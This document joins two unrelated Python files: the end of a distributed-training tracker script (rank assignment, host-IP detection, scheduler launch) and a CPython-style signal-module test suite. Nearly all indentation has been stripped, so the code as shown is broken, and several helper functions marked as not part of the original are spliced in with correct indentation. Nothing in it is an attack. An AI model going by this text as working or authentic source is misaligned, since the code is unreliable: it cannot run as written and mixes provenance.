ring_map_ = {}
tree_map_ = {}
parent_map_ = {}
for k, v in ring_map.items():
ring_map_[rmap[k]] = (rmap[v[0]], rmap[v[1]])
for k, v in tree_map.items():
tree_map_[rmap[k]] = [rmap[x] for x in v]
for k, v in parent_map.items():
if k != 0:
parent_map_[rmap[k]] = rmap[v]
else:
parent_map_[rmap[k]] = -1
return tree_map_, parent_map_, ring_map_
def accept_slaves(self, nslave):
# set of nodes that have finished the job
shutdown = {}
# set of nodes that are waiting for connections
wait_conn = {}
# maps job id to rank
job_map = {}
# list of workers that are pending rank assignment
pending = []
# lazy initialize tree_map
tree_map = None
while len(shutdown) != nslave:
fd, s_addr = self.sock.accept()
s = SlaveEntry(fd, s_addr)
if s.cmd == 'print':
msg = s.sock.recvstr()
logging.info(msg.strip())
continue
if s.cmd == 'shutdown':
assert s.rank >= 0 and s.rank not in shutdown
assert s.rank not in wait_conn
shutdown[s.rank] = s
logging.debug('Receive %s signal from %d', s.cmd, s.rank)
continue
assert s.cmd == 'start' or s.cmd == 'recover'
# lazily initialize the slaves
if tree_map is None:
assert s.cmd == 'start'
if s.world_size > 0:
nslave = s.world_size
tree_map, parent_map, ring_map = self.get_link_map(nslave)
# set of nodes that are still pending startup
todo_nodes = list(range(nslave))
else:
assert s.world_size == -1 or s.world_size == nslave
if s.cmd == 'recover':
assert s.rank >= 0
rank = s.decide_rank(job_map)
# batch assignment of ranks
if rank == -1:
assert len(todo_nodes) != 0
pending.append(s)
if len(pending) == len(todo_nodes):
pending.sort(key=lambda x: x.host)
for s in pending:
rank = todo_nodes.pop(0)
if s.jobid != 'NULL':
job_map[s.jobid] = rank
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
if s.wait_accept > 0:
wait_conn[rank] = s
logging.debug('Receive %s signal from %s; assign rank %d',
s.cmd, s.host, s.rank)
if len(todo_nodes) == 0:
logging.info('@tracker All of %d nodes getting started', nslave)
self.start_time = time.time()
else:
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
logging.debug('Receive %s signal from %d', s.cmd, s.rank)
if s.wait_accept > 0:
wait_conn[rank] = s
logging.info('@tracker All nodes finishes job')
self.end_time = time.time()
logging.info('@tracker %s secs between node start and job finish',
str(self.end_time - self.start_time))
def start(self, nslave):
def run():
self.accept_slaves(nslave)
self.thread = Thread(target=run, args=())
self.thread.daemon = True
self.thread.start()
def join(self):
while self.thread.is_alive():
self.thread.join(100)
def alive(self):
return self.thread.is_alive()
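# A small sanity-check sketch, not part of the original tracker: it builds the
# link map for a hypothetical 4-worker job and walks the ring produced by
# get_link_map() to confirm it forms a single cycle visiting every rank exactly
# once. The worker count and the loopback host are arbitrary illustration values.
def _check_ring_is_single_cycle(nslave=4):
    tracker = RabitTracker(hostIP='127.0.0.1', nslave=nslave)
    _, _, ring_map = tracker.get_link_map(nslave)
    seen = []
    rank = 0
    while rank not in seen:
        seen.append(rank)
        # follow the "next" link of the ring
        rank = ring_map[rank][1]
    assert sorted(seen) == list(range(nslave)), ring_map
    return ring_map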
class PSTracker(object):
"""
Tracker module for PS
"""
def __init__(self, hostIP, cmd, port=9091, port_end=9999, envs=None):
"""
Starts the PS scheduler
"""
self.cmd = cmd
if cmd is None:
return
envs = {} if envs is None else envs
self.hostIP = hostIP
sock = socket.socket(get_family(hostIP), socket.SOCK_STREAM)
for port in range(port, port_end):
try:
sock.bind(('', port))
self.port = port
sock.close()
break
except socket.error:
continue
env = os.environ.copy()
env['DMLC_ROLE'] = 'scheduler'
env['DMLC_PS_ROOT_URI'] = str(self.hostIP)
env['DMLC_PS_ROOT_PORT'] = str(self.port)
for k, v in envs.items():
env[k] = str(v)
self.thread = Thread(
target=(lambda: subprocess.check_call(self.cmd, env=env, shell=True, executable='/bin/bash')), args=())
self.thread.daemon = True
self.thread.start()
def join(self):
if self.cmd is not None:
while self.thread.is_alive():
self.thread.join(100)
def slave_envs(self):
if self.cmd is None:
return {}
else:
return {'DMLC_PS_ROOT_URI': self.hostIP,
'DMLC_PS_ROOT_PORT': self.port}
def alive(self):
if self.cmd is not None:
return self.thread.is_alive()
else:
return False
def get_host_ip(hostIP=None):
if hostIP is None or hostIP == 'auto':
hostIP = 'ip'
if hostIP == 'dns':
hostIP = socket.getfqdn()
elif hostIP == 'ip':
from socket import gaierror
try:
hostIP = socket.gethostbyname(socket.getfqdn())
except gaierror:
logging.warning('gethostbyname(socket.getfqdn()) failed... trying on hostname()')
hostIP = socket.gethostbyname(socket.gethostname())
if hostIP.startswith("127."):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# doesn't have to be reachable
s.connect(('10.255.255.255', 1))
hostIP = s.getsockname()[0]
return hostIP
def submit(nworker, nserver, fun_submit, hostIP='auto', pscmd=None):
if nserver == 0:
pscmd = None
envs = {'DMLC_NUM_WORKER' : nworker,
'DMLC_NUM_SERVER' : nserver}
hostIP = get_host_ip(hostIP)
if nserver == 0:
rabit = RabitTracker(hostIP=hostIP, nslave=nworker)
envs.update(rabit.slave_envs())
rabit.start(nworker)
if rabit.alive():
fun_submit(nworker, nserver, envs)
else:
pserver = PSTracker(hostIP=hostIP, cmd=pscmd, envs=envs)
envs.update(pserver.slave_envs())
if pserver.alive():
fun_submit(nworker, nserver, envs)
if nserver == 0:
rabit.join()
else:
pserver.join()
def start_rabit_tracker(args):
"""Standalone function to start rabit tracker.
Parameters
----------
args: arguments to start the rabit tracker.
"""
envs = {'DMLC_NUM_WORKER' : args.num_workers,
'DMLC_NUM_SERVER' : args.num_servers}
rabit = RabitTracker(hostIP=get_host_ip(args.host_ip), nslave=args.num_workers)
envs.update(rabit.slave_envs())
rabit.start(args.num_workers)
sys.stdout.write('DMLC_TRACKER_ENV_START\n')
# simply write configuration to stdout
for k, v in envs.items():
sys.stdout.write('%s=%s\n' % (k, str(v)))
sys.stdout.write('DMLC_TRACKER_ENV_END\n')
sys.stdout.flush()
rabit.join()
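# Illustration, not part of the original script: a launcher that runs this
# tracker in standalone mode is expected to read the block printed by
# start_rabit_tracker() between DMLC_TRACKER_ENV_START and DMLC_TRACKER_ENV_END
# and export those variables to every worker it spawns. A minimal parser for
# that block, written against the format emitted above, could look like this.
def parse_tracker_env(lines):
    env = {}
    recording = False
    for line in lines:
        line = line.strip()
        if line == 'DMLC_TRACKER_ENV_START':
            recording = True
        elif line == 'DMLC_TRACKER_ENV_END':
            break
        elif recording and '=' in line:
            key, value = line.split('=', 1)
            env[key] = value
    return env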
def main():
"""Main function if tracker is executed in standalone mode."""
parser = argparse.ArgumentParser(description='Rabit Tracker start.')
parser.add_argument('--num-workers', required=True, type=int,
help='Number of worker processes to be launched.')
parser.add_argument('--num-servers', default=0, type=int,
help='Number of server processes to be launched. Only used in PS jobs.')
parser.add_argument('--host-ip', default=None, type=str,
help=('Host IP address; this is only needed ' +
'if the host IP cannot be automatically guessed.'))
parser.add_argument('--log-level', default='INFO', type=str,
choices=['INFO', 'DEBUG'],
help='Logging level of the logger.')
args = parser.parse_args()
fmt = '%(asctime)s %(levelname)s %(message)s'
if args.log_level == 'INFO':
level = logging.INFO
elif args.log_level == 'DEBUG':
level = logging.DEBUG
else:
raise RuntimeError("Unknown logging level %s" % args.log_level)
logging.basicConfig(format=fmt, level=level)
if args.num_servers == 0:
start_rabit_tracker(args)
else:
raise RuntimeError("Do not yet support start ps tracker in standalone mode.")
if __name__ == "__main__":
main()
|
test_signal.py
|
import os
import random
import signal
import socket
import statistics
import subprocess
import sys
import threading
import time
import unittest
from test import support
from test.support.script_helper import assert_python_ok, spawn_python
try:
import _testcapi
except ImportError:
_testcapi = None
class GenericTests(unittest.TestCase):
def test_enums(self):
for name in dir(signal):
sig = getattr(signal, name)
if name in {'SIG_DFL', 'SIG_IGN'}:
self.assertIsInstance(sig, signal.Handlers)
elif name in {'SIG_BLOCK', 'SIG_UNBLOCK', 'SIG_SETMASK'}:
self.assertIsInstance(sig, signal.Sigmasks)
elif name.startswith('SIG') and not name.startswith('SIG_'):
self.assertIsInstance(sig, signal.Signals)
elif name.startswith('CTRL_'):
self.assertIsInstance(sig, signal.Signals)
self.assertEqual(sys.platform, "win32")
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class PosixTests(unittest.TestCase):
def trivial_signal_handler(self, *args):
pass
def test_out_of_range_signal_number_raises_error(self):
self.assertRaises(ValueError, signal.getsignal, 4242)
self.assertRaises(ValueError, signal.signal, 4242,
self.trivial_signal_handler)
self.assertRaises(ValueError, signal.strsignal, 4242)
def test_setting_signal_handler_to_none_raises_error(self):
self.assertRaises(TypeError, signal.signal,
signal.SIGUSR1, None)
def test_getsignal(self):
hup = signal.signal(signal.SIGHUP, self.trivial_signal_handler)
self.assertIsInstance(hup, signal.Handlers)
self.assertEqual(signal.getsignal(signal.SIGHUP),
self.trivial_signal_handler)
signal.signal(signal.SIGHUP, hup)
self.assertEqual(signal.getsignal(signal.SIGHUP), hup)
def test_strsignal(self):
self.assertIn("Interrupt", signal.strsignal(signal.SIGINT))
self.assertIn("Terminated", signal.strsignal(signal.SIGTERM))
self.assertIn("Hangup", signal.strsignal(signal.SIGHUP))
# Issue 3864, unknown if this affects earlier versions of freebsd also
def test_interprocess_signal(self):
dirname = os.path.dirname(__file__)
script = os.path.join(dirname, 'signalinterproctester.py')
assert_python_ok(script)
def test_valid_signals(self):
s = signal.valid_signals()
self.assertIsInstance(s, set)
self.assertIn(signal.Signals.SIGINT, s)
self.assertIn(signal.Signals.SIGALRM, s)
self.assertNotIn(0, s)
self.assertNotIn(signal.NSIG, s)
self.assertLess(len(s), signal.NSIG)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
class WindowsSignalTests(unittest.TestCase):
def test_valid_signals(self):
s = signal.valid_signals()
self.assertIsInstance(s, set)
self.assertGreaterEqual(len(s), 6)
self.assertIn(signal.Signals.SIGINT, s)
self.assertNotIn(0, s)
self.assertNotIn(signal.NSIG, s)
self.assertLess(len(s), signal.NSIG)
def test_issue9324(self):
# Updated for issue #10003, adding SIGBREAK
handler = lambda x, y: None
checked = set()
for sig in (signal.SIGABRT, signal.SIGBREAK, signal.SIGFPE,
signal.SIGILL, signal.SIGINT, signal.SIGSEGV,
signal.SIGTERM):
# Set and then reset a handler for signals that work on windows.
# Issue #18396, only for signals without a C-level handler.
if signal.getsignal(sig) is not None:
signal.signal(sig, signal.signal(sig, handler))
checked.add(sig)
# Issue #18396: Ensure the above loop at least tested *something*
self.assertTrue(checked)
with self.assertRaises(ValueError):
signal.signal(-1, handler)
with self.assertRaises(ValueError):
signal.signal(7, handler)
class WakeupFDTests(unittest.TestCase):
def test_invalid_call(self):
# First parameter is positional-only
with self.assertRaises(TypeError):
signal.set_wakeup_fd(signum=signal.SIGINT)
# warn_on_full_buffer is a keyword-only parameter
with self.assertRaises(TypeError):
signal.set_wakeup_fd(signal.SIGINT, False)
def test_invalid_fd(self):
fd = support.make_bad_fd()
self.assertRaises((ValueError, OSError),
signal.set_wakeup_fd, fd)
def test_invalid_socket(self):
sock = socket.socket()
fd = sock.fileno()
sock.close()
self.assertRaises((ValueError, OSError),
signal.set_wakeup_fd, fd)
def test_set_wakeup_fd_result(self):
r1, w1 = os.pipe()
self.addCleanup(os.close, r1)
self.addCleanup(os.close, w1)
r2, w2 = os.pipe()
self.addCleanup(os.close, r2)
self.addCleanup(os.close, w2)
if hasattr(os, 'set_blocking'):
os.set_blocking(w1, False)
os.set_blocking(w2, False)
signal.set_wakeup_fd(w1)
self.assertEqual(signal.set_wakeup_fd(w2), w1)
self.assertEqual(signal.set_wakeup_fd(-1), w2)
self.assertEqual(signal.set_wakeup_fd(-1), -1)
def test_set_wakeup_fd_socket_result(self):
sock1 = socket.socket()
self.addCleanup(sock1.close)
sock1.setblocking(False)
fd1 = sock1.fileno()
sock2 = socket.socket()
self.addCleanup(sock2.close)
sock2.setblocking(False)
fd2 = sock2.fileno()
signal.set_wakeup_fd(fd1)
self.assertEqual(signal.set_wakeup_fd(fd2), fd1)
self.assertEqual(signal.set_wakeup_fd(-1), fd2)
self.assertEqual(signal.set_wakeup_fd(-1), -1)
# On Windows, files are always blocking and Windows does not provide a
# function to test if a socket is in non-blocking mode.
@unittest.skipIf(sys.platform == "win32", "tests specific to POSIX")
def test_set_wakeup_fd_blocking(self):
rfd, wfd = os.pipe()
self.addCleanup(os.close, rfd)
self.addCleanup(os.close, wfd)
# fd must be non-blocking
os.set_blocking(wfd, True)
with self.assertRaises(ValueError) as cm:
signal.set_wakeup_fd(wfd)
self.assertEqual(str(cm.exception),
"the fd %s must be in non-blocking mode" % wfd)
# non-blocking is ok
os.set_blocking(wfd, False)
signal.set_wakeup_fd(wfd)
signal.set_wakeup_fd(-1)
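# Illustrative sketch, not part of the test suite: how an event loop typically
# consumes the wakeup fd exercised above. A non-blocking socketpair is
# registered with set_wakeup_fd(); when a signal arrives its number is written
# to that fd, which wakes up select() so Python-level handlers can run promptly.
# SIGTERM is only an example signal and POSIX os.kill() delivery is assumed.
def _wakeup_fd_demo():
    import select
    recv_sock, send_sock = socket.socketpair()
    recv_sock.setblocking(False)
    send_sock.setblocking(False)
    old_fd = signal.set_wakeup_fd(send_sock.fileno())
    old_handler = signal.signal(signal.SIGTERM, lambda signum, frame: None)
    try:
        os.kill(os.getpid(), signal.SIGTERM)
        # select() returns as soon as the signal number lands on the socket.
        readable, _, _ = select.select([recv_sock], [], [], 5.0)
        if recv_sock in readable:
            return list(recv_sock.recv(4096))
        return []
    finally:
        signal.signal(signal.SIGTERM, old_handler)
        signal.set_wakeup_fd(old_fd)
        recv_sock.close()
        send_sock.close()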
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class WakeupSignalTests(unittest.TestCase):
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def check_wakeup(self, test_body, *signals, ordered=True):
# use a subprocess to have only one thread
code = """if 1:
import _testcapi
import os
import signal
import struct
signals = {!r}
def handler(signum, frame):
pass
def check_signum(signals):
data = os.read(read, len(signals)+1)
raised = struct.unpack('%uB' % len(data), data)
if not {!r}:
raised = set(raised)
signals = set(signals)
if raised != signals:
raise Exception("%r != %r" % (raised, signals))
{}
signal.signal(signal.SIGALRM, handler)
read, write = os.pipe()
os.set_blocking(write, False)
signal.set_wakeup_fd(write)
test()
check_signum(signals)
os.close(read)
os.close(write)
""".format(tuple(map(int, signals)), ordered, test_body)
assert_python_ok('-c', code)
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def test_wakeup_write_error(self):
# Issue #16105: write() errors in the C signal handler should not
# pass silently.
# Use a subprocess to have only one thread.
code = """if 1:
import _testcapi
import errno
import os
import signal
import sys
from test.support import captured_stderr
def handler(signum, frame):
1/0
signal.signal(signal.SIGALRM, handler)
r, w = os.pipe()
os.set_blocking(r, False)
# Set wakeup_fd a read-only file descriptor to trigger the error
signal.set_wakeup_fd(r)
try:
with captured_stderr() as err:
_testcapi.raise_signal(signal.SIGALRM)
except ZeroDivisionError:
# An ignored exception should have been printed out on stderr
err = err.getvalue()
if ('Exception ignored when trying to write to the signal wakeup fd'
not in err):
raise AssertionError(err)
if ('OSError: [Errno %d]' % errno.EBADF) not in err:
raise AssertionError(err)
else:
raise AssertionError("ZeroDivisionError not raised")
os.close(r)
os.close(w)
"""
r, w = os.pipe()
try:
os.write(r, b'x')
except OSError:
pass
else:
self.skipTest("OS doesn't report write() error on the read end of a pipe")
finally:
os.close(r)
os.close(w)
assert_python_ok('-c', code)
def test_wakeup_fd_early(self):
self.check_wakeup("""def test():
import select
import time
TIMEOUT_FULL = 10
TIMEOUT_HALF = 5
class InterruptSelect(Exception):
pass
def handler(signum, frame):
raise InterruptSelect
signal.signal(signal.SIGALRM, handler)
signal.alarm(1)
# We attempt to get a signal during the sleep,
# before select is called
try:
select.select([], [], [], TIMEOUT_FULL)
except InterruptSelect:
pass
else:
raise Exception("select() was not interrupted")
before_time = time.monotonic()
select.select([read], [], [], TIMEOUT_FULL)
after_time = time.monotonic()
dt = after_time - before_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
""", signal.SIGALRM)
def test_wakeup_fd_during(self):
self.check_wakeup("""def test():
import select
import time
TIMEOUT_FULL = 10
TIMEOUT_HALF = 5
class InterruptSelect(Exception):
pass
def handler(signum, frame):
raise InterruptSelect
signal.signal(signal.SIGALRM, handler)
signal.alarm(1)
before_time = time.monotonic()
# We attempt to get a signal during the select call
try:
select.select([read], [], [], TIMEOUT_FULL)
except InterruptSelect:
pass
else:
raise Exception("select() was not interrupted")
after_time = time.monotonic()
dt = after_time - before_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
""", signal.SIGALRM)
def test_signum(self):
self.check_wakeup("""def test():
import _testcapi
signal.signal(signal.SIGUSR1, handler)
_testcapi.raise_signal(signal.SIGUSR1)
_testcapi.raise_signal(signal.SIGALRM)
""", signal.SIGUSR1, signal.SIGALRM)
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pending(self):
self.check_wakeup("""def test():
signum1 = signal.SIGUSR1
signum2 = signal.SIGUSR2
signal.signal(signum1, handler)
signal.signal(signum2, handler)
signal.pthread_sigmask(signal.SIG_BLOCK, (signum1, signum2))
_testcapi.raise_signal(signum1)
_testcapi.raise_signal(signum2)
# Unblocking the 2 signals calls the C signal handler twice
signal.pthread_sigmask(signal.SIG_UNBLOCK, (signum1, signum2))
""", signal.SIGUSR1, signal.SIGUSR2, ordered=False)
@unittest.skipUnless(hasattr(socket, 'socketpair'), 'need socket.socketpair')
class WakeupSocketSignalTests(unittest.TestCase):
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def test_socket(self):
# use a subprocess to have only one thread
code = """if 1:
import signal
import socket
import struct
import _testcapi
signum = signal.SIGINT
signals = (signum,)
def handler(signum, frame):
pass
signal.signal(signum, handler)
read, write = socket.socketpair()
write.setblocking(False)
signal.set_wakeup_fd(write.fileno())
_testcapi.raise_signal(signum)
data = read.recv(1)
if not data:
raise Exception("no signum written")
raised = struct.unpack('B', data)
if raised != signals:
raise Exception("%r != %r" % (raised, signals))
read.close()
write.close()
"""
assert_python_ok('-c', code)
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def test_send_error(self):
# Use a subprocess to have only one thread.
if os.name == 'nt':
action = 'send'
else:
action = 'write'
code = """if 1:
import errno
import signal
import socket
import sys
import time
import _testcapi
from test.support import captured_stderr
signum = signal.SIGINT
def handler(signum, frame):
pass
signal.signal(signum, handler)
read, write = socket.socketpair()
read.setblocking(False)
write.setblocking(False)
signal.set_wakeup_fd(write.fileno())
# Close sockets: send() will fail
read.close()
write.close()
with captured_stderr() as err:
_testcapi.raise_signal(signum)
err = err.getvalue()
if ('Exception ignored when trying to {action} to the signal wakeup fd'
not in err):
raise AssertionError(err)
""".format(action=action)
assert_python_ok('-c', code)
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def test_warn_on_full_buffer(self):
# Use a subprocess to have only one thread.
if os.name == 'nt':
action = 'send'
else:
action = 'write'
code = """if 1:
import errno
import signal
import socket
import sys
import time
import _testcapi
from test.support import captured_stderr
signum = signal.SIGINT
# This handler will be called, but we intentionally won't read from
# the wakeup fd.
def handler(signum, frame):
pass
signal.signal(signum, handler)
read, write = socket.socketpair()
# Fill the socketpair buffer
if sys.platform == 'win32':
# bpo-34130: On Windows, sometimes non-blocking send fails to fill
# the full socketpair buffer, so use a timeout of 50 ms instead.
write.settimeout(0.050)
else:
write.setblocking(False)
# Start with large chunk size to reduce the
# number of send needed to fill the buffer.
written = 0
for chunk_size in (2 ** 16, 2 ** 8, 1):
chunk = b"x" * chunk_size
try:
while True:
write.send(chunk)
written += chunk_size
except (BlockingIOError, socket.timeout):
pass
print(f"%s bytes written into the socketpair" % written, flush=True)
write.setblocking(False)
try:
write.send(b"x")
except BlockingIOError:
# The socketpair buffer seems full
pass
else:
raise AssertionError("%s bytes failed to fill the socketpair "
"buffer" % written)
# By default, we get a warning when a signal arrives
msg = ('Exception ignored when trying to {action} '
'to the signal wakeup fd')
signal.set_wakeup_fd(write.fileno())
with captured_stderr() as err:
_testcapi.raise_signal(signum)
err = err.getvalue()
if msg not in err:
raise AssertionError("first set_wakeup_fd() test failed, "
"stderr: %r" % err)
# And also if warn_on_full_buffer=True
signal.set_wakeup_fd(write.fileno(), warn_on_full_buffer=True)
with captured_stderr() as err:
_testcapi.raise_signal(signum)
err = err.getvalue()
if msg not in err:
raise AssertionError("set_wakeup_fd(warn_on_full_buffer=True) "
"test failed, stderr: %r" % err)
# But not if warn_on_full_buffer=False
signal.set_wakeup_fd(write.fileno(), warn_on_full_buffer=False)
with captured_stderr() as err:
_testcapi.raise_signal(signum)
err = err.getvalue()
if err != "":
raise AssertionError("set_wakeup_fd(warn_on_full_buffer=False) "
"test failed, stderr: %r" % err)
# And then check the default again, to make sure warn_on_full_buffer
# settings don't leak across calls.
signal.set_wakeup_fd(write.fileno())
with captured_stderr() as err:
_testcapi.raise_signal(signum)
err = err.getvalue()
if msg not in err:
raise AssertionError("second set_wakeup_fd() test failed, "
"stderr: %r" % err)
""".format(action=action)
assert_python_ok('-c', code)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class SiginterruptTest(unittest.TestCase):
def readpipe_interrupted(self, interrupt):
"""Perform a read during which a signal will arrive. Return True if the
read is interrupted by the signal and raises an exception. Return False
if it returns normally.
"""
# use a subprocess to have only one thread, to have a timeout on the
# blocking read and to not touch signal handling in this process
code = """if 1:
import errno
import os
import signal
import sys
interrupt = %r
r, w = os.pipe()
def handler(signum, frame):
1 / 0
signal.signal(signal.SIGALRM, handler)
if interrupt is not None:
signal.siginterrupt(signal.SIGALRM, interrupt)
print("ready")
sys.stdout.flush()
# run the test twice
try:
for loop in range(2):
# send a SIGALRM in a second (during the read)
signal.alarm(1)
try:
# blocking call: read from a pipe without data
os.read(r, 1)
except ZeroDivisionError:
pass
else:
sys.exit(2)
sys.exit(3)
finally:
os.close(r)
os.close(w)
""" % (interrupt,)
with spawn_python('-c', code) as process:
try:
# wait until the child process is loaded and has started
first_line = process.stdout.readline()
stdout, stderr = process.communicate(timeout=5.0)
except subprocess.TimeoutExpired:
process.kill()
return False
else:
stdout = first_line + stdout
exitcode = process.wait()
if exitcode not in (2, 3):
raise Exception("Child error (exit code %s): %r"
% (exitcode, stdout))
return (exitcode == 3)
def test_without_siginterrupt(self):
# If a signal handler is installed and siginterrupt is not called
# at all, when that signal arrives, it interrupts a syscall that's in
# progress.
interrupted = self.readpipe_interrupted(None)
self.assertTrue(interrupted)
def test_siginterrupt_on(self):
# If a signal handler is installed and siginterrupt is called with
# a true value for the second argument, when that signal arrives, it
# interrupts a syscall that's in progress.
interrupted = self.readpipe_interrupted(True)
self.assertTrue(interrupted)
def test_siginterrupt_off(self):
# If a signal handler is installed and siginterrupt is called with
# a false value for the second argument, when that signal arrives, it
# does not interrupt a syscall that's in progress.
interrupted = self.readpipe_interrupted(False)
self.assertFalse(interrupted)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class ItimerTest(unittest.TestCase):
def setUp(self):
self.hndl_called = False
self.hndl_count = 0
self.itimer = None
self.old_alarm = signal.signal(signal.SIGALRM, self.sig_alrm)
def tearDown(self):
signal.signal(signal.SIGALRM, self.old_alarm)
if self.itimer is not None: # test_itimer_exc doesn't change this attr
# just ensure that itimer is stopped
signal.setitimer(self.itimer, 0)
def sig_alrm(self, *args):
self.hndl_called = True
def sig_vtalrm(self, *args):
self.hndl_called = True
if self.hndl_count > 3:
# it shouldn't be here, because it should have been disabled.
raise signal.ItimerError("setitimer didn't disable ITIMER_VIRTUAL "
"timer.")
elif self.hndl_count == 3:
# disable ITIMER_VIRTUAL, this function shouldn't be called anymore
signal.setitimer(signal.ITIMER_VIRTUAL, 0)
self.hndl_count += 1
def sig_prof(self, *args):
self.hndl_called = True
signal.setitimer(signal.ITIMER_PROF, 0)
def test_itimer_exc(self):
# XXX I'm assuming -1 is an invalid itimer, but maybe some platform
# defines it ?
self.assertRaises(signal.ItimerError, signal.setitimer, -1, 0)
# Negative times are treated as zero on some platforms.
if 0:
self.assertRaises(signal.ItimerError,
signal.setitimer, signal.ITIMER_REAL, -1)
def test_itimer_real(self):
self.itimer = signal.ITIMER_REAL
signal.setitimer(self.itimer, 1.0)
signal.pause()
self.assertEqual(self.hndl_called, True)
# Issue 3864, unknown if this affects earlier versions of freebsd also
@unittest.skipIf(sys.platform in ('netbsd5',),
'itimer not reliable (does not mix well with threading) on some BSDs.')
def test_itimer_virtual(self):
self.itimer = signal.ITIMER_VIRTUAL
signal.signal(signal.SIGVTALRM, self.sig_vtalrm)
signal.setitimer(self.itimer, 0.3, 0.2)
start_time = time.monotonic()
while time.monotonic() - start_time < 60.0:
# use up some virtual time by doing real work
_ = pow(12345, 67890, 10000019)
if signal.getitimer(self.itimer) == (0.0, 0.0):
break # sig_vtalrm handler stopped this itimer
else: # Issue 8424
self.skipTest("timeout: likely cause: machine too slow or load too "
"high")
# virtual itimer should be (0.0, 0.0) now
self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0))
# and the handler should have been called
self.assertEqual(self.hndl_called, True)
def test_itimer_prof(self):
self.itimer = signal.ITIMER_PROF
signal.signal(signal.SIGPROF, self.sig_prof)
signal.setitimer(self.itimer, 0.2, 0.2)
start_time = time.monotonic()
while time.monotonic() - start_time < 60.0:
# do some work
_ = pow(12345, 67890, 10000019)
if signal.getitimer(self.itimer) == (0.0, 0.0):
break # sig_prof handler stopped this itimer
else: # Issue 8424
self.skipTest("timeout: likely cause: machine too slow or load too "
"high")
# profiling itimer should be (0.0, 0.0) now
self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0))
# and the handler should have been called
self.assertEqual(self.hndl_called, True)
def test_setitimer_tiny(self):
# bpo-30807: C setitimer() takes a microsecond-resolution interval.
# Check that float -> timeval conversion doesn't round
# the interval down to zero, which would disable the timer.
self.itimer = signal.ITIMER_REAL
signal.setitimer(self.itimer, 1e-6)
time.sleep(1)
self.assertEqual(self.hndl_called, True)
class PendingSignalsTests(unittest.TestCase):
"""
Test pthread_sigmask(), pthread_kill(), sigpending() and sigwait()
functions.
"""
@unittest.skipUnless(hasattr(signal, 'sigpending'),
'need signal.sigpending()')
def test_sigpending_empty(self):
self.assertEqual(signal.sigpending(), set())
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
@unittest.skipUnless(hasattr(signal, 'sigpending'),
'need signal.sigpending()')
def test_sigpending(self):
code = """if 1:
import os
import signal
def handler(signum, frame):
1/0
signum = signal.SIGUSR1
signal.signal(signum, handler)
signal.pthread_sigmask(signal.SIG_BLOCK, [signum])
os.kill(os.getpid(), signum)
pending = signal.sigpending()
for sig in pending:
assert isinstance(sig, signal.Signals), repr(pending)
if pending != {signum}:
raise Exception('%s != {%s}' % (pending, signum))
try:
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
"""
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'pthread_kill'),
'need signal.pthread_kill()')
def test_pthread_kill(self):
code = """if 1:
import signal
import threading
import sys
signum = signal.SIGUSR1
def handler(signum, frame):
1/0
signal.signal(signum, handler)
tid = threading.get_ident()
try:
signal.pthread_kill(tid, signum)
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
"""
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def wait_helper(self, blocked, test):
"""
test: body of the "def test(signum):" function.
blocked: number of the blocked signal
"""
code = '''if 1:
import signal
import sys
from signal import Signals
def handler(signum, frame):
1/0
%s
blocked = %s
signum = signal.SIGALRM
# child: block and wait the signal
try:
signal.signal(signum, handler)
signal.pthread_sigmask(signal.SIG_BLOCK, [blocked])
# Do the tests
test(signum)
# The handler must not be called on unblock
try:
signal.pthread_sigmask(signal.SIG_UNBLOCK, [blocked])
except ZeroDivisionError:
print("the signal handler has been called",
file=sys.stderr)
sys.exit(1)
except BaseException as err:
print("error: {}".format(err), file=sys.stderr)
sys.stderr.flush()
sys.exit(1)
''' % (test.strip(), blocked)
# sig*wait* must be called with the signal blocked: since the current
# process might have several threads running, use a subprocess to have
# a single thread.
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'sigwait'),
'need signal.sigwait()')
def test_sigwait(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
signal.alarm(1)
received = signal.sigwait([signum])
assert isinstance(received, signal.Signals), received
if received != signum:
raise Exception('received %s, not %s' % (received, signum))
''')
@unittest.skipUnless(hasattr(signal, 'sigwaitinfo'),
'need signal.sigwaitinfo()')
def test_sigwaitinfo(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
signal.alarm(1)
info = signal.sigwaitinfo([signum])
if info.si_signo != signum:
raise Exception("info.si_signo != %s" % signum)
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
signal.alarm(1)
info = signal.sigtimedwait([signum], 10.1000)
if info.si_signo != signum:
raise Exception('info.si_signo != %s' % signum)
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait_poll(self):
# check that polling with sigtimedwait works
self.wait_helper(signal.SIGALRM, '''
def test(signum):
import os
os.kill(os.getpid(), signum)
info = signal.sigtimedwait([signum], 0)
if info.si_signo != signum:
raise Exception('info.si_signo != %s' % signum)
''')
